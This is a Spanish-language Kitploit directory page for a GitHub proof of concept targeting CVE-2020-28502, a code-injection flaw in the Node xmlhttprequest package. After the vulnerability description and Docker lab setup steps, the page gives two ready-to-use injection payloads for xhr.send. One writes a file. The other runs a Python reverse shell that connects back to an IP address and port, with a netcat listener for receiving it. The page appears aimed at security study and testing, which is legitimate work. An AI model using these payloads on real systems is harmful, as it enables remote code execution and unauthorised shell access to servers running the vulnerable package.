Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
Herramientas/GitHubGitHub/s-index/cve-2020-28502
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

Ver Repositorio
32hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-28502 node-XMLHttpRequest RCE

Descripción de NVD

Esto afecta al paquete xmlhttprequest anterior a la versión 1.7.0; todas las versiones del paquete xmlhttprequest-ssl. Siempre que las solicitudes se envíen de forma síncrona (async=False en xhr.open), la entrada maliciosa del usuario que llega a xhr.send podría provocar que se inyecte y ejecute código arbitrario.

Demo

cve-2020-28502

Configuración

  1. Construir una imagen a partir de un Dockerfile
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. Ejecutar node app.js en un nuevo contenedor
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. Acceder a http://localhost:3000

localhost-image

Payload PoC

Añadir archivo

Enviar el payload

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Shell inversa

  1. Poner el cliente a la escucha
root@kitploit:~
$ nc -l 8888
  1. Enviar el payload

cambia la dirección IP (192.168.0.25) por tu dirección IP local

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Referencia

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935
Descargar herramienta